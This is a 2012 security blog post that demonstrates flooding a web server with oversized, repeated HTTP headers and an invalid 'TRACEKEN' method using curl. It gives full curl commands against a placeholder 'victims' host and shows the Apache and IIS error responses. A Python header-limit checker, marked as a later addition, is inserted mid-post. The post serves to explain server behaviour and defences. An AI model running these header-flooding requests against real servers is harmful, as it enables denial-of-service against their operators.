Thursday, December 27, 2012

Hacking around with the http header sizes and request type TRACE

A question came up on a case where DoS attempts were made against a webserver using heavily modified HTTP headers, so I figured I would demonstrate such an attack using curl.

In this case, the attacker sent valid requests, but with a few bogus header fields. So I got creative and figured I would show you how I would conduct that attack. I wanted to flood a server with more additional headers than the average client browser would be expected to send. It's easy to run this test via curl and the -H option.

e.g.

curl -v -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "Host: www.victims.com" --request TRACEKEN www.victims.com


HTTP/1.1 itself puts no limit on the size of the headers, but the request still has to be a syntactically valid HTTP request. In the above, my request method was simply "TRACEKEN", which was a play on the HTTP request method TRACE and my first name KEN :)

Here's what my server replied upon receipt of that request:

>
< HTTP/1.1 501 Method Not Implemented
< Date: Fri, 28 Dec 2012 00:09:19 GMT
< Server: Apache
< Allow: GET,HEAD,POST,OPTIONS,TRACE
< Content-Length: 220
< Cneonction: close
< Content-Type: text/html; charset=iso-8859-1
< Set-Cookie: NSC_qspmfyjd-209.200.154.11-80=ffffffffd2c09b0845525d5f4f58455e445a4a423660;expires=Fri, 28-Dec-2012 00:13:11 GMT;path=/;httponly
<
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>501 Method Not Implemented</title>
</head><body>
<h1>Method Not Implemented</h1>
<p>TRACEKEN to /index.html not supported.<br />
</p>
</body></html>
* Connection #0 to host www.victim.com left intact
* Closing connection #0


It was smart enough to recognize that TRACEKEN was not a valid method, but it also kicked out an error code of the 5XX series, and even gave me a list of the valid request methods it could take (see the Allow: line).

Hmm, interesting.

So if I increase the header size to God only knows what, the server will have to look at all of the header information in order to process the request:

curl -v -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "User-Agent:  testing" -H "Host: www.victims.com" --request TRACEK www.victims.com


And in this example, it generated an error code of the 5XX series (not good):

< HTTP/1.1 501 Method Not Implemented
< Date: Fri, 28 Dec 2012 00:23:46 GMT
< Server: Apache
< Allow: GET,HEAD,POST,OPTIONS,TRACE
< Content-Length: 218
< Cneonction: close
< Content-Type: text/html; charset=iso-8859-1
< Set-Cookie: NSC_qspmfyjd-209.200.154.11-80=ffffffffd2c09b0945525d5f4f58455e445a4a423660;expires=Fri, 28-Dec-2012 00:27:38 GMT;path=/;httponly


Now if I continued that line of approach and targeting, and further exceeded the limits within the HTTP header, the server gives me a 4XX code instead:

< HTTP/1.1 400 Bad Request
< Date: Fri, 28 Dec 2012 00:24:49 GMT
< Server: Apache
< Content-Length: 290
< nnCoection: close
< Content-Type: text/html; charset=iso-8859-1
< Set-Cookie: NSC_qspmfyjd-209.200.154.11-80=ffffffffd2c09b0945525d5f4f58455e445a4a423660;expires=Fri, 28-Dec-2012 00:28:41 GMT;path=/;httponly
<
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
The number of request header fields exceeds this server's limit.</p>
</body></html>
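To make the two behaviours above concrete from the server's side, here is an added example (my code, not part of the original post) of a minimal HTTP/1.1 request checker: it enforces a header-field count and field-size limit first, as the Apache responses above show, and only then checks the method against the Allow: list the post's server returned. The numeric limits are assumptions taken from Apache's documented defaults for LimitRequestFields and LimitRequestFieldSize, and the requests it builds are constructed to match the shape of the curl commands above.

```python
from typing import Tuple

MAX_HEADER_FIELDS = 100   # assumption: Apache's LimitRequestFields default
MAX_FIELD_SIZE = 8190     # assumption: Apache's LimitRequestFieldSize default
# Methods from the Allow: line the post's server sent back.
ALLOWED_METHODS = ("GET", "HEAD", "POST", "OPTIONS", "TRACE")


def check_request(raw: bytes) -> Tuple[int, str]:
    """Return (status, reason) in the order the post observed.

    Header limits are enforced while the header block is read, so an
    oversized block gets 400 even when the method is bogus; only a request
    that fits is then checked for a supported method (501 otherwise).
    """
    head, sep, _body = raw.partition(b"\r\n\r\n")
    if not sep:
        return 400, "Bad Request: incomplete header block"
    lines = head.split(b"\r\n")
    request_line, fields = lines[0], lines[1:]
    if len(fields) > MAX_HEADER_FIELDS:
        # Same condition behind "The number of request header fields
        # exceeds this server's limit." in the 400 response above.
        return 400, "Bad Request: too many request header fields"
    for field in fields:
        if len(field) > MAX_FIELD_SIZE:
            return 400, "Bad Request: request header field too long"
        if b":" not in field:
            return 400, "Bad Request: malformed header field"
    parts = request_line.split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/1."):
        return 400, "Bad Request: malformed request line"
    method = parts[0].decode("ascii", "replace")
    if method not in ALLOWED_METHODS:
        # "TRACEKEN" and "TRACEK" land here: well-formed, unknown method.
        return 501, "Method Not Implemented"
    return 200, "OK"


def build_request(method: str, repeats: int, host: str = "www.example.invalid") -> bytes:
    """Constructed request shaped like the post's curl commands: the method,
    a Host, curl's default Accept, and `repeats` copies of 'User-Agent: testing'."""
    fields = [f"Host: {host}", "Accept: */*"] + ["User-Agent: testing"] * repeats
    return (f"{method} / HTTP/1.1\r\n" + "\r\n".join(fields) + "\r\n\r\n").encode()
```

One curl detail worth knowing when reproducing the commands above: a custom header with nothing after the colon, such as -H "Host: ", tells curl to drop that header rather than send an empty one (-H "Host;" sends it empty), so only the User-Agent copies and the final Host line actually reach the server.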



btw: I also tried that same HTTP request against my mail hosting outfit, and it gave me the same error code of the 4XX series, but when the content was reduced, it just delivered a 301 redirection.

Here's an example of the webserver response (Microsoft) to the same TRACE or TRACEKEN request with big header fields:

< HTTP/1.1 501 Not Implemented
< Content-Type: text/html
< Server: Microsoft-IIS/7.5
< Set-Cookie: .ASPXANONYMOUS=IFulQiUbzgEkAAAANmVmMzQxMjYtOWY0NS00NDI2LThjNmUtOTY1NDJmYzBlY2Fjxq6qN8WmCfVI5ORB_WjaZz3LHIU1; expires=Thu, 07-Mar-2013 11:16:48 GMT; path=/; HttpOnly
< Date: Fri, 28 Dec 2012 00:36:48 GMT
< Content-Length: 1508
<
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>501 - Header values specify a method that is not implemented.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
 <div class="content-container"><fieldset>
  <h2>501 - Header values specify a method that is not implemented.</h2>
  <h3>The page you are looking for cannot be displayed because a header value in the request does not match certain configuration settings on the Web server. For example, a request header might specify a POST to a static file that cannot be posted to, or specify a Transfer-Encoding value that cannot make use of compression.</h3>
 </fieldset></div>
</div>



Happy hunting and best wishes to the DoS attackers and DoS defenders.

Ken Felix
Freelance Security & Network Engineer
kfelix at hyperfeed dot com



4 comments:

  1. Hello , is there any method to fix this? I mean the 400 one.

  2. I don't know what you mean by fix, but to prevent this, an IPS rule or better yet a WAF would prevent oversize HTTP headers or http.request lengths.

  3. This comment has been removed by the author.

  4. Is there any way I can increase the header length? So that even if someone gives a long proxy greater than the size of 1024 it doesn't throw me the 400 error? Actually in my system I have a curl command which has a long proxy 'AAAAAAAAAAA' and so on. And if I am running the command with the long proxy it gives me a 400 error the same as above, but if I shorten the proxy and then run the command I am getting the required result. As I am trying to fix the HTTPONLY vulnerability in my system, to cross check this our security team gave us the CURL command, but with the original command they gave with the long proxy we are getting 400. I want to get a code like 300 or 302 even with the long proxy (i.e. the original command). Kindly suggest how I can do that?
